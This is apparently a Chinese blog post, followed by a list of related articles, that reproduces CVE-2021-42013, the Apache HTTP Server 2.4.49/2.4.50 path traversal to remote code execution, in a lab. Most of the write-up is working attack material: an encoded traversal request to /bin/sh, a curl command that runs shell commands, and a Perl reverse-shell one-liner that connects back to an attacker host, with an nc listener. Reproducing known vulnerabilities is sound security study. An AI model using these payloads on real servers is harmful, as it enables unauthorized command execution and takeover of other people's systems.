apache 远程代码执行 (CVE_2021_42013)漏洞复现

最新推荐文章于 2024-09-29 14:26:59 发布
最新推荐文章于 2024-09-29 14:26:59 发布
阅读量162 收藏
点赞数
分类专栏: 网络安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XXokok/article/details/134630676
版权

apache 远程代码执行 (CVE_2021_42013)漏洞复现

名称: apache 远程代码执行 (CVE-2021-42013)

描述: Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。

以POST方式访问网站的这个路径

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

请求体内写 执行的命令

echo;whoami

​​image​​

还有一种方法也可以造成命令执行:

curl --data "echo;ls" 'http://192.168.91.129:35663//cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

​​image

也可以把服务器的shell弹过来(攻击机上做好监听 nc -lvvp 8899)

echo;perl -e 'use Socket;$i="192.168.91.130";$p=8899;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

1700991167416

因为漏洞形成的原因不一样,同样一种反弹shell的命令不可能适用于全部环境下。需要测试其它不同的命令,或python的或perl的,看对方服务器支持不支持了。

梧六柒
关注
专栏目录
Apache Struts2远程代码执行漏洞复现CVE-2021-31805)
0xSec
01-12 1403
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
CVE-2021-26295 Apache OFBiz反序列化远程代码执行漏洞复现
afei001
04-01 635
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 docker搭建漏洞环境 5.2 DNSlog验证CVE-2021-26295 5.3 CVE-2021-26295_Apache_OFBiz_POC.py 6.漏洞修复 1.漏洞概述 Apache OFBiz是一个非常著名的电子商务平台。它是用于企业流程自动化的开源产品。它包括用于ERP,CRM。构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统...
Apache HTTP Server 2.4.50 路径穿越漏洞CVE-2021-42013
weixin_47311099的博客
12-07 2434
Apache HTTP Server 2.4.50 路径穿越漏洞CVE-2021-42013Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.49
Apache漏洞CVE-2021-41773)
qq_68186313的博客
08-07 241
漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件 在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)3、在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cg命令。
Apache学习笔记(详解,漏洞复现,基线检查)
最新发布
qq_66934029的博客
09-29 1198
Apache 2.4.0-2.4.29当中存在,在上述版本当中,Apache开启了正则表达式的多行属性,在匹配.php$文件时除了会匹配到的.php结尾的文件还会匹配到.php\0a结尾的文件,在业务环境中.php结尾的文件会交由PHP解释器执行,所以黑客可以上传.php\0a结尾对的文件来绕过上传限制,并且让文件中的内容按照PHP代码执行。MaxKeepAliveRequests指令限制每个连接允许的请求数,打开KeepAlive时,如果将其设置为0, 则将允许无限制的请求。默认设置一般即符合要求。
Apache多个组件漏洞公开(CVE-2022-32533/CVE-2022-33980/CVE-2021-37839)
murphysec的博客
07-07 3045
7月6日,OSCS监测到Apache基金会旗下多个项目漏洞公开,请使用相应组件的开发者关注。Apache Portals Jetspeed-2 未安全处理用户输入,导致了包括 XSS、CSRF、XXE 和 SSRF 在内的许多问题。以 XSS 为例,注册的用户名设置为 时,注册登录后每次加载用户名都会触发弹窗,配置 xss.filter.post = true 可以缓解风险。但官方表示 Apache Portals Jetspeed-2 是 Apache Portals 中不再维护的项目,不会提供更新,OS
Apache CVE-2021-41773 漏洞复现
qq_65852138的博客
09-23 346
Apache CVE-2021-41773 漏洞复现
ApacheCVE-2021-41773漏洞
网安小白
08-06 258
漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件 在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)
CVE-2021-42013Apache HTTP Server目录遍历漏洞
weixin_47179815的博客
07-13 2929
漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行Apache HTTP Server 2.4.50 Apache HTTP Server 2.4.49查询地址:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Apache解析漏洞 CVE-2017-15715
m0_62284238的博客
09-10 234
进入vulnhub目录下的httpd目录,进入CVE-2017-15715目录。Apache禁止上传php文件,但是可以添加%0A换行符进行绕过。使用burpsuite抓包后改后缀为.php%0A。Apache是世界使用率排名第一的web服务器。上传成功后又会被Apache当作php文件解析。访问靶机的8080端口。出现如下即为开启成功!docker-compoe启动漏洞环境。直接上传.php文件会被拦截。上传一个后缀为phpa的文件。上传成功并且成功被解析!
Apache CVE-2021-41773漏洞复现
3tefanie丶zhou的博客
10-11 2732
漏洞简介 Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服
Apache HTTPD 换行解析漏洞CVE-2017-15715)
EC_Carrot的博客
05-19 144
漏洞详细 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 漏洞复现 我的环境是vulhub的靶机,开好靶机后打开网页:http://192.168.30.128:8080/ 正常上传一个马发现被拦 在eval.php后面插入一个\x0A(注意,不能是\x0D\x0A,只能是一个\x0A),重新放个包发现已经上传成功 ..
Apache换行解析漏洞CVE-2017-15715
qq_43665434的博客
05-10 760
Apache换行解析漏洞CVE-2017-15715 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 windows10 攻击机(burp) 192.168.1.120 实验过程 启动centos8靶机,搭建漏洞环境: #开启docker service docker start #进入cve-2017-15715目录 cd /usr/sbin/vulhub/httpd/cve-2017-15715 #启动漏洞环境 docker-compose
Apache HTTP Server路径遍历漏洞复现0day(CVE-2021-41773|CVE-2021-42013远程代码执行
内心不种满鲜花就会长满杂草
10-09 5652
声明:请勿用于非法入侵,仅供检测与学习!传送门 ——>中华人民共和国网络安全漏洞描述 在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功。此外,此缺陷可能会泄漏 CGI 脚本等解释文件的来源。已知此问题已被广泛利用。此问题仅影响 Apache 2.4.49 而不是早期版本。 fofa查询:server=.
一些Apache近期CVE复现姿势
weixin_48421613的博客
12-02 4318
Hadoop Yarn RPC 未授权访问漏洞 漏洞详情: Apache Hadoop YARN (Yet Another Resource Negotiator)是一种新的 Hadoop 资源管理器,它是一个通用资源管理系统,可为上层应用提供统一的资源管理和调度,它的引入为集群在利用率、资源统一管理和数据共享等方面带来了巨大好处。 HadoopYarn默认对外开放RPC服务,攻击者可利用RPC服务执行任意命令,进而控制服务器。同时由于Hadoop Yarn RPC服务访问控制机制开启方式与REST
Apache Tomcat 文件包含漏洞CVE-2020-1938)操作指南
乐大厨串串香飘万里
08-09 598
1.漏洞详细Tomcat是Apache软件基金会Jakarta 项目中的一个核心项目,作为目前比较流行的Web应用服务器,深受Java爱好者的喜爱,并得到了部分软件开发商的认可。Tomcat服务器是一个免费的开放源代码Web应用服务器,被普遍使用在轻量级Web应用服务的构架中。2020年1月6日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的Apache Tomcat文件包含漏洞。Tomcat AJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读
CVE-2021-44228远程代码执行复现与环境搭建指南
资源摘要信息:"CVE-2021-44228是2021年底爆出的一个重大安全漏洞,属于Apache Log4j 2的远程代码执行漏洞。Log4j 2广泛应用于Java应用中,用于日志记录。该漏洞允许攻击者通过插入恶意的JNDI(Java Naming and ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值